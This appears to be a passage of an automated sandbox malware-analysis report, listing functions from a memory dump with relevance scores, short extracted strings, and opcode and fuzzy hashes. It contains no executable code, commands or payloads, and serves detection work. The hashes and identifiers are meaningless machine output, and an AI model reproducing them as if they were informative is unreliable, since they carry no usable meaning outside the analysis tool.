                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $i$l$o$u
                                                                                      • API String ID: 0-2051669658
                                                                                      • Opcode ID: a5dccdbd15732118c35b309e3f7efe2aabbfe6d4b2a729431e530e7d6dfc1f58
                                                                                      • Instruction ID: 02f966a527e29bd8f2d5af58c2cb419074db7e229dc9a67b4a91206c341674d3
                                                                                      • Opcode Fuzzy Hash: a5dccdbd15732118c35b309e3f7efe2aabbfe6d4b2a729431e530e7d6dfc1f58
                                                                                      • Instruction Fuzzy Hash: F46141B5A00304AFDB24DBA4CC80FEFB7FDAB48714F144599E919A7250EB35BA45CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D52644 Relevance: 6.4, Strings: 5, Instructions: 125COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $i$l$o$u
                                                                                      • API String ID: 0-2051669658
                                                                                      • Opcode ID: 765cdef00625a3fca87418c4ec0e2a0e25ae59bb050225e52134b21eb4e06adb
                                                                                      • Instruction ID: d0d30d1b6bd822ef6712de90c0ec0c80b2a87b9a9b2b56c8a4ccd9e6ecff85c8
                                                                                      • Opcode Fuzzy Hash: 765cdef00625a3fca87418c4ec0e2a0e25ae59bb050225e52134b21eb4e06adb
                                                                                      • Instruction Fuzzy Hash: 07411BB1A00308AFDB20DFA4CC84FEEBBF9EB48714F104559E919A7250DB75AA45CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D4EB37 Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4$9$M$O$y
                                                                                      • API String ID: 0-1709836335
                                                                                      • Opcode ID: 4e99f22e12867ce6852309ce1e02e2273d376f8c983dd6efded3245648efb3bc
                                                                                      • Instruction ID: 4e56eaa8d5fbb6feaf1e284e5e888487d07b41cab3c8582f4bda5eb0d40f7903
                                                                                      • Opcode Fuzzy Hash: 4e99f22e12867ce6852309ce1e02e2273d376f8c983dd6efded3245648efb3bc
                                                                                      • Instruction Fuzzy Hash: 213114B1E10119BBEB10EB94DD41FFE77B8EF44308F008199E905AB240E776AA458BF5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D522E7 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $e$k$o
                                                                                      • API String ID: 0-3624523832
                                                                                      • Opcode ID: f34e851c983612427d6b355b4398a02a18ee5edd43b831caba5c2c1a807e861d
                                                                                      • Instruction ID: cc798003d60e8b7446224ef954f1180773d1f35a558684451d294045d21be7fb
                                                                                      • Opcode Fuzzy Hash: f34e851c983612427d6b355b4398a02a18ee5edd43b831caba5c2c1a807e861d
                                                                                      • Instruction Fuzzy Hash: 45B10EB5A00704AFDB24DBA4CC85FEFB7F9AF88704F104558FA19A7240DA74AA45CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D52BE7 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $e$h$o
                                                                                      • API String ID: 0-3662636641
                                                                                      • Opcode ID: 5c74a7a926895c2270d8489b63ed91a689799dffb257edd9b4777449277fbc8a
                                                                                      • Instruction ID: 1553db4e9b639f8c48ad70ccbaaddca9a564635b723e57656ea844bdbb0d6810
                                                                                      • Opcode Fuzzy Hash: 5c74a7a926895c2270d8489b63ed91a689799dffb257edd9b4777449277fbc8a
                                                                                      • Instruction Fuzzy Hash: 0F7140B2A002187EEF65EB94CC85FEE73BCEF49704F0045D9A54966150EE746B848FB2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D522DE Relevance: 5.2, Strings: 4, Instructions: 179COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $e$k$o
                                                                                      • API String ID: 0-3624523832
                                                                                      • Opcode ID: 1ea0f181c32ef17a214a8446ea0f7bc51f3b093a0c6dc6cf056257a2767b3a31
                                                                                      • Instruction ID: c6dd66c509dd3350426608cb098b91b5572df043dedf0fa5d9550b4391b4b807
                                                                                      • Opcode Fuzzy Hash: 1ea0f181c32ef17a214a8446ea0f7bc51f3b093a0c6dc6cf056257a2767b3a31
                                                                                      • Instruction Fuzzy Hash: 5B613FB5A00348AFDB54DFA4CC84FEFB7FDAF88704F104558A619AB244DB74AA45CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D521A9 Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                      • API String ID: 0-2877786613
                                                                                      • Opcode ID: e5910c60555dc53cce4f29cc0211f1d266a36a1651c465baa5a9824c57cc445f
                                                                                      • Instruction ID: 77b02ba49e4c6e072fea1926c46061f9d1e3cf464e6ece033884d7d90fe9b081
                                                                                      • Opcode Fuzzy Hash: e5910c60555dc53cce4f29cc0211f1d266a36a1651c465baa5a9824c57cc445f
                                                                                      • Instruction Fuzzy Hash: 36310871B512587BEB11EB948C41FEE7B7CEF55708F004189FA056A180EBB4BA05CBB6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D521B7 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                      • API String ID: 0-2877786613
                                                                                      • Opcode ID: 20c3aa4a54752a690dbe66121e89b5215e54d3f7ba24b4864020ef92681a8f4c
                                                                                      • Instruction ID: 95dd8784a2e89e1c20ee43805fc4c00b02dc1393ba0b9d16df672d60e15ca0b0
                                                                                      • Opcode Fuzzy Hash: 20c3aa4a54752a690dbe66121e89b5215e54d3f7ba24b4864020ef92681a8f4c
                                                                                      • Instruction Fuzzy Hash: F3310771B512587BEB11EB948C42FEF7B7CEF95708F004588BA056A180EB74BA05C7B6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D52BDB Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $e$h$o
                                                                                      • API String ID: 0-3662636641
                                                                                      • Opcode ID: ec7b55185a598643dffc410eb3f7a395a180ba196405faab382df87351b4a1a6
                                                                                      • Instruction ID: e20e3e79868b670dd7cdd74c39e9faa25ae87f6427bbaa22c4e76e7794c2adbf
                                                                                      • Opcode Fuzzy Hash: ec7b55185a598643dffc410eb3f7a395a180ba196405faab382df87351b4a1a6
                                                                                      • Instruction Fuzzy Hash: 894141B1E00218AFEF50EBA4CC45FEF73B8EF45304F4045DAA549A6150EB756B848FA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D4FD37 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $e$k$o
                                                                                      • API String ID: 0-3624523832
                                                                                      • Opcode ID: ef8edd782559a16b85f60e024113ad0beb66c8ae92fd232e83f929ea9f83a2d7
                                                                                      • Instruction ID: c1d6c365bfc6cea9b89886af7c520cdceee87f27f9984f32c99e94f5b5818cae
                                                                                      • Opcode Fuzzy Hash: ef8edd782559a16b85f60e024113ad0beb66c8ae92fd232e83f929ea9f83a2d7
                                                                                      • Instruction Fuzzy Hash: 650184B2900218ABDB14DF98D885ADEF7B9FF48314F04825DE9196F205E771A945CBB0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 04D3AEA0 Relevance: 5.0, Strings: 4, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #$0$age=$max-
                                                                                      • API String ID: 0-2455145082
                                                                                      • Opcode ID: 80d4071e58e56516aa817539a79f3e2d6d3c789d047d7aa73bced05d2bdb2f66
                                                                                      • Instruction ID: 32191aa8dd0758e2bd8d5b686dbd3301723960e1fa2874b9cc880a0a222ce438
                                                                                      • Opcode Fuzzy Hash: 80d4071e58e56516aa817539a79f3e2d6d3c789d047d7aa73bced05d2bdb2f66
                                                                                      • Instruction Fuzzy Hash: C3F0E2B2F0014C6BEB00DFE4E8416EDBB78EB40304F100AA8EC599E241E6329648C792
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%